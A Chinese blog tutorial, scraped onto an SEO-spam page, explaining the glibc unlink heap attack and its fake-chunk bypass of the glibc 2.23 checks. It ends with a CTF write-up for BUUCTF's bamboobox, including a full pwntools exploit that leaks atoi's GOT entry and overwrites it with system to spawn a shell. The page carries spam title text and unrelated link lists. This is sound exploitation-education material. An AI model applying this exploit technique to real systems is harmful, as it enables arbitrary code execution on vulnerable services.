当前位置: 首页 > news >正文

武汉做网站多少钱seo顾问收费

武汉做网站多少钱,seo顾问收费,微信如何自己创建公众号,微信公众号的h5网站开发堆机制我研究了很久,一直没有什么很大的进展。堆相较于栈难度大的多。利用手法也多。目前还没有怎么做过堆题。这次就把理解了很久的Unlink写一写。然后找一题实践一下。 在glibc中,堆管理都是用一个个chunk去组织的。这个就不过多阐述。Unlink是glibc一…

堆机制我研究了很久,一直没有什么很大的进展。堆相较于栈难度大的多。利用手法也多。目前还没有怎么做过堆题。这次就把理解了很久的Unlink写一写。然后找一题实践一下。

在glibc中,堆管理都是用一个个chunk去组织的。这个就不过多阐述。Unlink是glibc一段宏操作。目的是将一个空闲chunk从双向链表组织的bins中摘下,做后续的操作。Unlink攻击其实是为了欺骗堆管理器造成任意地址可读可写。wiki的描述其实挺好,我这里把这个32位的没有检测的攻击原理详细描述一次,以便后续理解64位中加入检测的绕过攻击手段。首先我们要理解Unlink到底干什么。


这是Unlink的源码,不管检测我们只看大概操作,wiki的图总结的很好:


其实就是所谓的断链操作,让P的前一个chunk指向后一个chunk,然后P的后一个chunk指回P的前一个chunk。这个理解后我们现在可以写一段程序:

#include<stdio.h>
#include<stdlib.h>int main()
{
void *chunk1_ptr=(void*)malloc(0x80);
void *chunk2_ptr=(void*)malloc(0x80);void * chunk3_ptr;
void * c=(void*)malloc(0x20); //防止top chunk 合并free(chunk2_ptr);gets("%s",&chunk1_ptr);  //有UAF才行 直接执行会发生段错误 只作为演示free(chunk1_ptr);return 0;
}

这段代码只是为了解释这个效果,并不能直接运行。一开始创建2个堆,大小是0x80,在创建一个小堆防止合并。紧接着我们把chunk2释放掉。这个时候,chunk2会进入到small bins中。我们知道在small bins中,chunk的管理是双向链表。因此Unlink是会发生在这里的。 画图演示这个过程:


我们假设程序通过溢出或者UAF修改了chunk2的fd和bk,我这里让chunk2的fd指向free的got表地址,bk指向一段内存中我们可读可写可执行的地方(也就是能布置shellcode的)。紧接着我们把chunk1也释放掉。这个时候,glibc会做如下几步的操作:

  • glibc 判断这个块是 small chunk
  • 判断前向合并,发现前一个 chunk 处于使用状态,不需要前向合并
  • 判断后向合并,发现后一个 chunk 处于空闲状态,需要合并
  • 继而对 Nextchunk 采取 unlink 操作

 它检测到chunk2是一个空闲块。但是此时chunk2在small bins里。想要合并就得先拿下来。这就会执行Unlink执行拿下来的操作,然后再做合并。进入到Unlink步骤我们看看会发生什么:

  • FD=P->fd = free@got-12
  • BK=P->bk = shellcode地址
  • FD->bk = BK,FD指向BK
  • BK->fd = FD,BK指向FD

前两步的图如下:


后两步的图如下:


此时我们的布局就完成了。那么它为何能起到任意地址读写呢。我们知道P的fd和bk都是我们自己构造的。就像上图,我想在free的got表里写入我们自己的shellcode地址,那么我们只需要将想要写入的地址-12填入fd,就能通过伪造的chunk找到。接下来,我们再把这块内存申请出来,因为在 small bin 中,glibc 采用了一种先进先出(First In First Out,FIFO)的策略。也就是说,当你再次申请内存时,glibc 会从 bin 的头部摘取第一个可用的 chunk。这是因为 small bin 维护了一个循环链表,新的 chunk 会被插入到链表的尾部,而分配时则从链表的头部开始查找可用的 chunk。因此当我们再次malloc同样大小的chunk的时候,它将会把BK给我们申请出来,申请出来的内存空间,我们就能随意改写了。当我们再次调用free函数的时候,将会去执行我们的shellcode。


上述是我们没有考虑glibc的一些保护机制,从而能达到这种攻击方式。但是在2.23版本的glibc中,是有对unlink的正确性做检查的。

// fd bk
if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                      \malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \

这种情况下,会检验FD->bk以及BK->fd是否指向的是同一个。意味着如果篡改了,glibc将不会完成后续的Unlink操作。不仅对这个有检验,还对chunk_size有所检验:

    // 由于P已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致。if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \malloc_printerr ("corrupted size vs. prev_size");               \

因此在2.23中,想要绕过这两个检验,我们需要伪造chunk,也就是俗称的fake_chunk。 并且我们需要在构造的时候,P的fd和bk的指向要构造的像那么回事,才能绕过检测。那么怎么构造呢。假设有一个指向P这个chunk的地址叫addr1。那么当我们构造P这个chunk的时候:

                                                       fd=&addr1-0x18

                                                      bk=&addr1-0x10

在检验的时候就会绕过检测。我们画图理解这个过程:


这个时候,如果P_chunk发生unlink将会变成如下形式: 这样我们就能绕过验证,网上有师傅总结这个公式是怎么算出来的。我也忘了,有兴趣的可以查下。接着执行后续步骤,后续步骤执行完,我们能得到一个很神奇的东西:


形成这样的效果后,如果我们往里面填入一个got表的地址,假设是free的got表。我们看看会发生什么,当我们能往这个地址写入数据的时候,他将能指向任意地址并写入:


这就是整个unlink的攻击效果。下面我们拿一题来练练手熟悉下这个过程。选题为BUUCTF上的

hitcontraining_bamboobox1。简单查看下保护:没有PIE(运用unlink一般不能开PIE),大概测试了下,是个增删改查的小程序:


IDA中查看了下逻辑:





程序存在堆溢出漏洞。我们可以通过溢出覆盖下一个chunk,构造fake_chunk并进行unlink。构造如下:

 payload = p64(0) + p64(0x81) + p64(bss - 3 * 8) + p64(bss - 2 * 8) + b'a' * (0x80 - 0x20)

payload += p64(0x80) + p64(0x90) 

这样构造的目的是改写下一个chunk的标志位,触发fake_chunk能够进行unlink操作,并且在第二个chunk的数据域构造一个伪chunk。bss是我们存放堆地址的空间:


接着我们释放fake_chunk,进行unlink操作后,每当我们向chunk0写东西时,他将写入的东西传给了&bss-0x18的位置。由于程序中每次到用到atoi函数,因此我们的想法是改atoi函数的got表,让他指向system函数。因此我们泄露atoi函数地址后,再通过写入&bss-0x18进行改写,完整WP如下这是别的师傅写的我觉得比较好,注释也比较详细,便于理解:

# -*- coding: utf-8 -*-from pwn import *#sh = remote("node4.buuoj.cn", 28735)
sh = process('./bamboobox')  # linux本地运行
context.log_level = 'debug'  # 开启debug模式
elf = ELF('./bamboobox')  # 把elf文件放到代码目录下
libc = ELF('./libc-2.23.so')  # 把libc的so文件放到目录下# 首先是写函数来模拟增删改查四种api,之后只能用这四个函数与程序进行交互
def show_item():sh.sendlineafter(b"Your choice:", b"1")def add_item(length, name):sh.sendlineafter(b"Your choice:", b"2")sh.sendlineafter(b"Please enter the length of item name:", str(length).encode())sh.sendlineafter(b"Please enter the name of item:", name.encode())def change_item(index, length, name):sh.sendlineafter(b"Your choice:", b"3")sh.sendlineafter(b"Please enter the index of item:", str(index).encode())sh.sendlineafter(b"Please enter the length of item name:", str(length).encode())sh.sendlineafter(b"Please enter the new name of the item:", name)def remove_item(index):sh.sendlineafter(b"Your choice:", b"4")sh.sendlineafter(b"Please enter the index of item:", str(index).encode())if __name__ == "__main__":bss = 0x6020c8  # bss节基址,change_item根据bss[0]来找修改的目标内存#gdb.attach(sh)add_item(0x80, "fake_chunk")  # 申请一块0x80B的内存构造fake_chunkadd_item(0x80, "f")  # chunk_fadd_item(0x10, "other")# 构造fake_chunk[prev_size, size, fd, bk, data]payload = p64(0) + p64(0x81) + p64(bss - 3 * 8) + p64(bss - 2 * 8) + b'a' * (0x80 - 0x20)# 覆盖f的prev_size和sizepayload += p64(0x80) + p64(0x90)change_item(index=0, length=len(payload), name=payload)  # 利用change的堆溢出漏洞将payload写入堆中remove_item(index=1)  # free(f),之后bss[0]=bss-3*8。这样一来只要向chunk0写数据就等于向bss-3*8处写数据# 读取atoi()在got表中的地址atoi@got,写入到bss[0]处atoi_got = elf.got['atoi']payload = p64(0) * 3 + p64(atoi_got)change_item(0, len(payload), payload)# show泄露atoi()地址,打印出来show_item()sh.recvuntil(b"0 : ")atoi_addr = u64(sh.recv(6).ljust(8, b"\x00"))  # 接收6个字节。填充成8字节,转为64位整数success("atoi_addr:%x" % atoi_addr)libc_base = atoi_addr - libc.sym["atoi"]  # 计算出libc的基址=atoi在内存中的地址-atoi相对libc的地址success("libc_base:%x" % libc_base)# 由于此时bss[0]=atoi在got中的地址,所以程序会认为此处是chunk,写入system的地址。从而将GOT表中原来atoi地址的位置覆盖成system函数的内存地址change_item(0, 8, p64(libc_base + libc.sym["system"]))# 发送"/bin/sh",程序会将其传给之前atoi位置的system函数,执行shellsh.sendlineafter(b"Your choice:", b"/bin/sh")sh.interactive()

例题的讲解讲的不是很好,写了太久脑袋有点混沌了。抽空我再完善下wp部分。有师傅打这题用的house_of_orange,有兴趣的可以参看。

参考链接:https://www.cnblogs.com/nemuzuki/p/17293352.html

http://www.ritt.cn/news/22671.html

相关文章:

  • 梧州门户网站什么是网站
  • 上海网页建站模板怎么做好seo内容优化
  • 小程序app制作需要多少钱网站seo外链平台
  • 如何编写一套网站模板免费推广链接
  • 龙岩网站建设一般宁波seo推荐优化
  • 如何做企业推广seo关键词优化指南
  • 做独立网站的好处电商运营去哪里学比较好
  • 网站页面footer的copy衡阳seo排名
  • wordpress smzdm主题班级优化大师免费下载安装
  • 保定网站公司网络推广网站的方法
  • 最棒的网站建设谷歌app官方下载
  • html制作电影网站搜索关键词查询工具
  • 那个网站可以做宣传广州代运营公司有哪些
  • ps做网站首页效果特效百度seo和谷歌seo有什么区别
  • wordpress 表单 验证码广州百度推广优化排名
  • 郑州哪些公司做网站比较好有效的网络推广
  • 徐州金桥建设监理有限公司网站搜狗搜索旧版本
  • 模型下载网站开发流程中国去中心化搜索引擎
  • 网站怎么做伪静态天津优化公司哪家好
  • 网站建设方式网络工程师培训机构排名
  • 给网站做插画分辨率免费大数据平台
  • 石家庄营销推广网站电商的推广方式有哪些
  • 西安网站建设阳建百度收录是什么意思
  • 海兴县做网站杭州百度代理公司
  • 做暧暧网站杭州网站优化公司哪家好
  • 做的怎样 英文网站seo服务建议
  • 可靠的手机做任务网站搜索引擎优化免费
  • 中山智能设备网站建设巨量引擎广告投放平台登录入口
  • 网站开发 界面小广告
  • 个人网站可以做咨询吗专业网站优化